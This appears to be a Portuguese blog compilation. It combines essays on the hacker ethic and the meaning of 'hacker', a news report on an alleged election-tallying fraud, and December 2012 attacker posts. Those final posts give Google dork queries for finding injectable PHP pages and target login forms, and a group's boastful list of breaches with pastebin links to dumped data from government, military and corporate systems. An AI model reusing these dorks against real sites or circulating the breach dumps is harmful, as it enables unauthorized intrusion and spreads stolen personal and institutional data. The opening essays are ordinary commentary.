Este ponto de vista só encontra precursores na vida monástica, a qual sempre pregou que "o ócio é o inimigo da alma", e contrasta fortemente com a visão geral predominante antes do século XVI. Mesmo a Igreja considerava o trabalho (especialmente o mais árduo) como uma espécie de punição. No dia santo, o domingo, no qual até mesmo o próprio Deus descansou, não se devia trabalhar. O Céu era um lugar onde, assim como no domingo, ninguém precisava trabalhar. Enquanto que, no Inferno, os pecadores são condenados a trabalhos eternos e inúteis, um terrível sofrimento, como Dante Alighieri muitas vezes mostra no seu clássico A Divina Comédia do século XIV. Pode-se dizer que, nessa época, o propósito da vida era o domingo.
O que a ética de trabalho protestante faz é inverter este paradigma, deslocando o propósito da vida para a sexta-feira. O trabalho deixa de ser uma punição e passa a ser uma bênção. Isto é um movimento tão radical que se pode dizer que o Céu e o Inferno trocaram de lugar. Sísifo, que na mitologia grega tentou enganar os deuses e foi punido com o fardo de empurrar eternamente uma grande rocha até ao cume de uma montanha muito íngreme e, quando ele estava preste a chegar com ela ao topo, a rocha caía, tornou-se um herói, como ilustrado por Himanen [2].

Esta reviravolta de pensamento e principalmente na forma de se encarar o trabalho caiu como uma luva para o desenvolvimento do então nascente capitalismo. Esta justificativa de origem religiosa foi rapidamente tomada e incorporada por ele, que logo a separou da religião e imprimiu seus próprios mecanismos. Com isso, passou-se a poder falar em ética protestante independentemente de fé ou cultura. Este fato foi a base que permitiu o florescimento da Era Industrial, na qual os trabalhos eram árduos e enfadonhos, mas era necessário que alguém os fizesse, fosse na Europa ou no Japão.
Com o fim da Era Industrial e a consolidação do que está sendo designado como Era da Informação, é natural que se espere o surgimento de um novo pensamento que questione estes valores vigentes, mesmo que o capitalismo ainda tenha chegado a este ponto com considerável força. Força esta que pode ser vista na formação da "nova economia" que, embora envolva significantes diferenças na sociedade em rede com relação à anterior industrial, é meramente uma nova forma de capitalismo. É justamente neste cenário que emerge o que foi chamado anteriormente de ética hacker.
De acordo com Himanen, a ética hacker, que deve ser entendida abrangendo todas as áreas de atividade humana e não apenas a computação, é uma nova ética de trabalho que questiona a ética protestante e propõe um espírito alternativo para a sociedade em rede. Embora seja mais próxima da ética de trabalho pré-protestante, ela não concebe este como sendo um castigo e não descreve o paraíso como sendo um lugar onde não se faz coisa alguma. Na visão do hacker, o sentido da vida está em dedicar-se a uma paixão. Esta paixão é, na realidade, uma atividade significativa, inspiradora e prazerosa para o indivíduo, seja ela rotulada como "trabalho" ou como "diversão".

No entanto, a sua realização nem sempre é apenas prazer e alegria, podendo envolver aspectos menos interessantes e apaixonantes e mesmo muito trabalho duro e tedioso. Ainda assim, o hacker está disposto a realizar este esforço em prol de algo que considera maior. A significação do todo faz valer a pena qualquer esforço despendido na execução de suas partes menos atraentes. Além disso, é bem diferente ter de fazer partes menos prazerosas ao realizar uma paixão do que ter de se sujeitar permanentemente a um trabalho desagradável.
Um outro aspecto da ética hacker é uma visão fortemente diferente do dinheiro com relação à vigente na sociedade capitalista, na qual este é o maior e mais valorizado bem. Para o hacker, o dinheiro é uma questão secundária. Não é um objetivo de vida nem a razão do seu trabalho. Ele não é o propósito de uma ação. Assim, um hacker "pode se satisfazer com menos riqueza material ao perceber que sua verdadeira paixão deu uma contribuição para os outros" [3] ou para a sociedade de um modo geral.
Aliás, esta motivação social também é um fator importante nesta nova ética. A realização da paixão hacker está intimamente ligada com alguma espécie de colaboração na construção de um bem maior para a sociedade. Isto poderia ser visto até como uma influência meio hippie, anos 60, do tipo "vamos construir um mundo melhor", mas tem uma importância fundamental para a estruturação de toda esta ideologia.
Talvez esteja no "hackerismo" o melhor exemplo do lado positivo da globalização, entendendo-se "hackerismo" como um grupo de indivíduos realizando suas paixões juntos e fora das estruturas de corporações ou governos. Não importa a nacionalidade, cor, raça das outras pessoas. O que importa é que elas estão juntas, provavelmente por meio da Internet, para fazer coisas que acham interessantes e construtivas.
Obviamente, um movimento que se propõe a questionar o modelo corrente não poderia passar sem causar desconforto naqueles que estão bem estabelecidos e confortáveis beneficiando-se do status quo. Pode-se especular, então, que esta "onda difamatória" [1] que causa esta confusão toda na cabeça do cidadão comum tenha origem nos "interesses da indústria de software proprietário, procurando minar a confiabilidade pública no software livre" [1], como sugere Rezende. Seguindo por estes caminhos, também não se pode descartar a possibilidade de conluio ou mesmo de manipulação da mídia, visando a proteção desta mesma indústria, a qual, por sinal, é consideravelmente rica.
No entanto, uma possível suplantação da ética de trabalho protestante não é uma coisa que poderia acontecer de uma hora para a outra, lembra Himanen. Tal evento seria uma grande mudança cultural e este tipo de coisa demanda muito tempo para se completar. Principalmente, porque "a ética protestante está tão profundamente enraizada na nossa consciência atual que ela é freqüentemente pensada como se fosse simplesmente da 'natureza humana'. Obviamente, não é" [2], como pode ser visto no decorrer da História.
Enquanto isso, para amenizar os efeitos da confusão feita pela mídia com relação ao termo hacker, Rezende sugere em [1] a cunhagem de uma nova palavra para designar esta comunidade, já que não se tem muito controle sobre a evolução de uma língua (como ele diz, "o uso faz o idioma"). O termo que ele relata ter sido escolhido pelos verdadeiros hackers para se autodenominarem é "geek". Porém, talvez este não tenha em si, pelo menos ainda não, toda a semântica e história que há por trás do original, deixando uma sensação de inacurácia e de que algo está faltando. Por outro lado, também não carrega toda a contaminação que foi infringida ao termo original nas últimas décadas.
Na verdade, a melhor solução para esta confusão seria a fortificação da ideologia hacker, tornando-a clara e conhecida por todos, o que a deixaria menos vulnerável a falácias nominais. Mesmo que isso possa se chocar com os interesses de classes atualmente dominantes. É possível que, conforme a sociedade da informação vá seguindo o seu caminho e vá amadurecendo, as próprias necessidades naturais, que inevitavelmente aparecem, encarreguem-se de implantar esta nova ética de trabalho, a qual, espera-se, possa ser ao menos um pouco melhor do que a atual.

Referências

[1] REZENDE, Pedro A. D. Sobre o uso do termo "hacker". In: http://www.cic.unb.br/docentes/pedro/trabs/hackers.htm. Abril, 2000. [2] HIMANEN, Pekka. The Hacker Ethic and the Spirit of the Information Age. Random House, 2001.
[3] COUTO, Sérgio P. O que pensar dos hackers? In: Revista Geek, Ano III, Número 14. Digerati Editorial. Agosto, 2001.

* Fabrício César Ferreira Anastácio, Bacharelando em Ciências da Computação da Universidade de Brasília, aluno da disciplina Segurança dos Dados em 1/02

Fonte:http://www.cic.unb.br/docentes/pedro/trabs/hackers2.htm
 

Sobre o uso do termo "hacker"


Sobre o uso do termo "hacker"

Sobre o uso do termo "hacker"

Prof. Pedro Antonio Dourado de Rezende
Departamento de Ciência da Computação
Universidade de Brasília
Abril de 2000



Temos visto o termo hacker ser utilizado na mídia como sinônimo de pirata digital, invasor, vândalo, etc. Cito como exemplo a matéria de 25/03/00 do jornal o Globo entitulada "Policia força 'hackers' a desistir de invasões", do jornalista Aguinaldo Novo, e a matéria do caderno de informática da Folha de São Paulo de 05/03/00 entitulada  "Banda Larga exige mais segurança no micro", do jornalista Bruno Grattoni. Ambos cometem o mesmo equívoco -- comum na mídia leiga e que vem contribuindo negativamente para a evolução do vernáculo da nossa lingua pátria -- quando oferecem ao leitor uma simplificada tradução para o anglicismo "hacker", entre parêntesis após a primeira ocorrência do vocábulo no corpo de seus textos: piratas de computador e piratas da internet (sic.), respectivamente.
Na repetição deste engano, tais traduções "simplificadas" contribuem para dificultar a compreensão coletiva das novas dinâmicas sociais postas em marcha com os novos meios de comunicação virtual, a internet. Quem atua no ramo, sabe que na gíria da informática em língua inglesa, o termo "hacker" (lenhador) foi inicialmente usado para designar quem possui habilidades técnicas para explorar meandros e nuances em programas de computador, e usa essa habilidade para resolver problemas. Um poeta, digamos, nas línguas intermediárias entre o homem e a máquina. Hackear é esmiuçar. Não significa, e nem mesmo é condição para, piratear, vandalizar ou vender serviços criminosos, como querem alguns jornalistas. Para designar tal conduta  existem outros termos, como "lamer" ou "cracker", por exemplo. Insistir no uso do termo hacker como sinônimo de criminoso digital esconde uma componente ideológica ruim, que pretende igualar a habilidade curiosa com a intenção criminosa. Como referência, posso indicar uma reportagem especial da CNN em http://www.cnn.com/TECH/specials/hackers/, ou o dicionário "Wired style: Principle of English usage in the Digital Age", da editora Constance Hale, 1999.
Não creio ser justificado o argumento da simplicidade (em beneficio da compreensão do leitor), que alguns jornalistas usam para insistirem no engano. Alguns fazem até gracinhas com suas próprias confusões, responsabilizando outros pela sua falta de clareza com a língua, tais como a falta de legislação adequada, a falta de segurança, a falta  de "especialistas", etc. Além de banalizar a questão moral e jurídica do dolo, essa preguiçosa tradução esconde o problema dos riscos crescentes que as tecnologias da informação embutem. Hoje em dia, com a popularização das ferramentas que exploram defeitos e falhas de segurança de softwares na internet, um cracker não precisa mais ser um hacker, e um novo termo surge no jargão da informática em ingles para designar os crakers que não são hackers: são os "script kiddies" (algo como 'garotos com receitas de bolo').
A insistência nesse erro, aqui e ali, contribui não apenas para confundir habilidade com má intenção no mundo virtual, refletindo e amplificando a tendência humana ao medo ante o desconhecido, como  também para encobrir a complexidade do problema da segurança nele. As perdas com fraudes eletronicas na industria financeira giram hoje em torno de US$ 50 bilhões anuais, segundo algumas estimativas que circulam em listas de discussão sobre segurança na internet. Essas fraudes são praticadas por quadrilhas altamente especializadas, e não por script kiddies que buscam notoriedade desfigurando páginas informativas na web.
Os hackers não podem ser coletivamente cassificados como criminsos indesejáveis, pois alguns deles desempenham  para o software um papel  semelhante ao da seleção natural na evolução das espécies naturais, descobrindo falhas de segurança nos softwares em uso pelo mundo e reportando suas descobertas aos desenvolvedores, às vezes sugerindo estratégias de reparo. São também os grandes responsáveis pelo enorme patrimônio intelectual em software livre que circula pelo mundo hoje, e do qual todos engajados na revolução digital estão se beneficiando. Chamar a estes de "hackers éticos", como fazem alguns para atenuar o erro de tradução, apenas agrava tal confusão, pois assume a desonestidade como condição preliminar e natural à ação associada. E há muito software ruim por ai, acredite-me, precisando de hackers  normais (quero dizer honestos) para corrigi-los ou denunciá-los. (como referência, posso indicar o site http:\\www.badsoftware.com). Além disso, é possível que por trás desta onda difamatória estejam interesses da indústria do software proprietário, procurando minar a confiabilidade pública no software livre, como deixa transparecer seu lobby legislativo pelo UCITA. Sob o manto do combate à pirataria e o argumento da uniformização de leis, esta nova legislação americana sobre licença e uso do software poderá sufocar o movimento por liberdade na produção e uso de software
Aos olhos que conhecem a origem do termo, seu uso como empregado por Aguinaldo Novo e Bruno Grattoni indica que o jornalista não fez seu dever de casa ou não entende suficientemente bem o assunto sobre o qual está se ofercendo para traduzir. Gostaria que esta mensagem seja recebida não como pedantismo, mas como estímulo ao bom  jornalismo, haja vista a responsabilidade de veículos de massa  do porte do seus jornais em relação à nossa lingua.
Mas por outro lado, o uso faz o idioma. Como os verdadeiros hackers não tem controle sobre o uso do termo que inicialmente escolheram para designarem-se, hoje contaminado pelo uso que leigos dele passaram a fazer, resta-lhes adotar um novo termo para se referirem  a si mesmos, se quiserem se livrar da pecha que este uso lhes traz. Temos agora na palavra geek o nome que os verdadeiros hackers escolheram para se referirem a si mesmos, sem a contaminação leiga impingida ao antigo termo.

Fonte:http://www.cic.unb.br/docentes/pedro/trabs/hackers.htm

Voto eletrônico: Hacker de 19 anos revela no Rio como fraudou eleição


Voto eletrônico: Hacker de 19 anos revela no Rio como fraudou eleição


Um novo caminho para fraudar as eleições informatizadas brasileiras foi apresentado ontem (10/12) para as mais de 100 pessoas que lotaram durante três horas e meia o auditório da Sociedade de Engenheiros e Arquitetos do Rio de Janeiro (SEAERJ), na Rua do Russel n° 1, no decorrer do seminário “A urna eletrônica é confiável?”, promovido pelos institutos de estudos políticos das seções fluminense do Partido da República (PR), o Instituto Republicano; e do Partido Democrático Trabalhista (PDT), a Fundação Leonel Brizola-Alberto Pasqualini.
Acompanhado por um especialista em transmissão de dados, Reinaldo Mendonça, e de um delegado de polícia, Alexandre Neto, um jovem hacker de 19 anos, identificado apenas como Rangel por questões de segurança, mostrou como — através de acesso ilegal e privilegiado à intranet da Justiça Eleitoral no Rio de Janeiro, sob a responsabilidade técnica da empresa Oi – interceptou os dados alimentadores do sistema de totalização e, após o retardo do envio desses dados aos computadores da Justiça Eleitoral, modificou resultados beneficiando candidatos em detrimento de outros – sem nada ser oficialmente detectado.
“A gente entra na rede da Justiça Eleitoral quando os resultados estão sendo transmitidos para a totalização e depois que 50% dos dados já foram transmitidos, atuamos. Modificamos resultados  mesmo quando a totalização está prestes a ser fechada”, explicou Rangel, ao detalhar em linhas gerais como atuava para fraudar resultados.
O depoimento do hacker – disposto a colaborar com as autoridades –  foi chocante até para os palestrantes convidados para o seminário, como a Dra. Maria Aparecida Cortiz, advogada que há dez anos representa o PDT no Tribunal Superior Eleitoral (TSE) para assuntos relacionados à urna eletrônica; o professor da Ciência da Computação da Universidade de Brasília, Pedro Antônio Dourado de Rezende, que estuda as fragilidades do voto eletrônico no Brasil, também há mais de dez anos; e o jornalista Osvaldo Maneschy, coordenador e organizador do livro Burla Eletrônica, escrito em 2002 ao término do primeiro seminário independente sobre o sistema eletrônico de votação em uso no país desde 1996.
Rangel, que está vivendo sob proteção policial e já prestou depoimento na Polícia Federal, declarou aos presentes que não atuava sozinho: fazia parte de pequeno grupo que – através de acessos privilegiados à rede de dados da Oi – alterava votações antes que elas fossem oficialmente computadas pelo Tribunal Regional Eleitoral (TRE).
A fraude, acrescentou, era feita em benefício de políticos com base eleitoral na Região dos Lagos – sendo um dos beneficiários diretos dela, ele o citou explicitamente, o atual presidente da Assembléia Legislativa do Estado do Rio de Janeiro (Alerj), o deputado Paulo Melo (PMDB). A deputada Clarissa Garotinho, que  também fazia parte da mesa, depois de dirigir algumas perguntas a Rangel  - afirmou que se informará mais sobre o assunto e não pretende deixar a denúncia de Rangel cair no vazio.
Fernando Peregrino, coordenador do seminário, por sua vez, cobrou providências:
“Um crime grave foi cometido nas eleições municipais deste ano, Rangel o está denunciando com todas as letras –  mas infelizmente até agora a Polícia Federal não tem dado a este caso a importância que ele merece porque  ele atinge a essência da própria democracia no Brasil, o voto dos brasileiros” – argumentou Peregrino.
Por ordem de apresentação, falaram no seminário o presidente da FLB-AP, que fez um histórico do voto no Brasil desde a República Velha até os dias de hoje, passando pela tentativa de fraudar a eleição de Brizola no Rio de Janeiro em 1982 e a informatização total do processo, a partir do recadastramento eleitoral de 1986.
A Dra. Maria Aparecida Cortiz, por sua vez, relatou as dificuldades para fiscalizar o processo eleitoral por conta das barreiras criadas pela própria Justiça Eleitoral; citando, em seguida, casos concretos de fraudes ocorridas em diversas partes do país – todos abafados pela Justiça Eleitoral. Detalhou fatos ocorridos em Londrina (PR), em Guadalupe (PI), na Bahia e no Maranhão, entre outros.
Já o professor Pedro Rezende, especialista em Ciência da Computação, professor de criptografia da Universidade de Brasília (UnB), mostrou o trabalho permanente do TSE em “blindar” as urnas em uso no país, que na opinião deles são 100% seguras. Para Rezende, porém, elas são “ultrapassadas e inseguras”. Ele as comparou com sistemas de outros países, mais confiáveis,  especialmente as urnas eletrônicas de terceira geração usadas em algumas províncias argentinas, que além de imprimirem o voto, ainda registram digitalmente o mesmo voto em um chip embutido na cédula, criando uma dupla segurança.
Encerrando a parte acadêmica do seminário, falou o professor Luiz Felipe, da Coppe da Universidade Federal do Rio de Janeiro, que em 1992, no segundo Governo Brizola, implantou a Internet no Rio de Janeiro junto com o próprio Fernando Peregrino, que, na época, presidia a Fundação de Amparo à Pesquisa do Rio de Janeiro (Faperj). Luis Felipe reforçou a idéia de que é necessário aperfeiçoar o sistema eleitoral brasileiro – hoje inseguro, na sua opinião.
O relato de Rangel – precedido pela exposição do especialista em redes de dados, Reinaldo, que mostrou como ocorre a fraude dentro da intranet, que a Justiça Eleitoral garante ser segura e inexpugnável – foi o ponto alto do seminário.
Peregrino informou que o seminário  será transformado em livro e tema de um documentário que com certeza dará origem a outros encontros sobre o mesmo assunto – ano que vem. Disse ainda estar disposto a levar a denuncia de Rangel as últimas conseqüências e já se considerava um militante pela transparência das eleições brasileiras: “Estamos aqui comprometidos com a trasnparência do sistema eletrônico de votação e com a democracia no Brasil”, concluiu. (OM)

Fonte:http://www.viomundo.com.br/denuncias/voto-eletronico-hacker-de-19-anos-revela-no-rio-como-fraudou-eleicao.html

terça-feira, 11 de dezembro de 2012

Dork forçando filtro procurar erros!




Dork forçando filtro procurar erros!


Faz um tempo que não posto dorks certo aé vai uma Dork que força o filtro, deixando nossa pesquisa muito mais limpa e objetiva.


Dork:intext:(You have) intext:error  +inurl:.php?*id= -forums -bugs -stackoverflow -help -apost -w3school -exploit -title:"PHP*" -inurl:tuto*"

Pode add operador site:domínio, vamos deixar muito mais limpa nossa pesquisa.

domingo, 9 de dezembro de 2012

Procurando pagina de logins com dorks

Procurando pagina de logins com dorks
Muitas vezes não precisamos de programas sofisticados para achar forms de login.
Utilizando poder dork.
O que são DORK, a grosso modo são meios de pesquisa avançada em motores de busca, que tem o intuito de explorar seus alvos de acordo com a necessidade do atacante.
Pode ser usado para procurar SQLI,RFI,LFI, Arquivo sensíveis e etc...
No momento este post vai dar uma ajuda em achar forms de login.

Alvo:www.siteteste1.com.br
Dork 01: site:.siteteste1.com.br +login
Dork 02: site:.siteteste1.com.br +senha
Dork 03: site:.siteteste1.com.br +admin
..... etc assim vai.

sábado, 8 de dezembro de 2012

Informativo invasão www.navy.mi.th It, grupo Cyb3rGh0sts

Informativo 



Informativo invasão www.navy.mi.th It, grupo Cyb3rGh0sts

Grupo de hacker invadem servidores:

www.navy.mi.th

Nome do grupo: Cyb3rGh0sts

By: Crlo Lvd & Syztem Schmelzer
Cyb3rGh0sts & AnonCyber

INFORMAÇÕES CAPTURADAS

sexta-feira, 7 de dezembro de 2012

Informativo Últimos feitos do grupo Cyb3rGh0sts

    INFORMATIVO
    Últimos feitos do grupo
    Cyb3rGh0sts.
     
    By: Crlo Lvd & Syztem Schmelzer
    Cyb3rGh0sts & AnonCyber
     
    By: Crlo Lvd & Syztem Schmelzer Cyb3rGh0sts & AnonCyber
     
     
    ------------------------------------------------------------------------------------------------------
     
     
    Exposed vários sites                                                     - http://pastebin.com/51CBKn3d
    Câmara Municipal de Uberlândia                                - http://pastebin.com/Bq0xSxhW
    NASA                                                                           - http://pastebin.com/5ASgs8CF
    AT & T                                                                         - http://pastebin.com/GsFPwMhm
    Diversos governos do mundo                                       - http://pastebin.com/UfdvKc31
    Marinha dos E.U.A - NAVY (Novamente)                   - http://pastebin.com/ywWmT42e
    DirectV - E.U.A                                                            - http://pastebin.com/NENqb38z
    Department of Homeland Security (DHS)                    - http://pastebin.com/gZpfYYnY
    Universidade do Alabama                                             - http://pastebin.com/Jxh2mRGz
    Unesco - Portal da Cultura da América Latina e Caribe  - http://pastebin.com/dPSTQQDd
    Ataques realizados pela Cyb3rGh0sts anteriormente      - http://pastebin.com/NkxpsLLd
    Playboy Itália                                                                  - http://pastebin.com/aRR3LTuQ
    Presidência da Colômbia                                                 - http://pastebin.com/vVWYsmZi
    Vereador Ronivaldo Maia - PT                                        - http://pastebin.com/4TBukrej
    Informações detalhadas de várias pessoas.                       - http://pastebin.com/Y5djgXSB
    Kia Motors (EC)                                                              - http://pastebin.com/RkdVv66t
    Lista de Endereços IP
    NSA, NASA, pentagono, CenterComputer                     - http://pastebin.com/cPjCcq1T
    FBI, NSA, Banco Nacional da Venezuela                       - http://pastebin.com/4nQZ10r1
    Universidade da Califórnia                                              - http://pastebin.com/6p1t3GH4
    Defensoria Pública do Pará                                             - http://pastebin.com/vDMzpykd
    Admins das maiores empresas do mundo, entre eles:
    Adobe, Amazon, AT & T, Dell, Disney, Ebay, GoDaddy,
    Google, HP, Intel, MasterCard, Microsoft Passport, No-ip,
    Paypal, Symantec, Yahoo...                                             - http://pastebin.com/HWEKncvs
     
    ------------------------------------------------------------------------------------------------------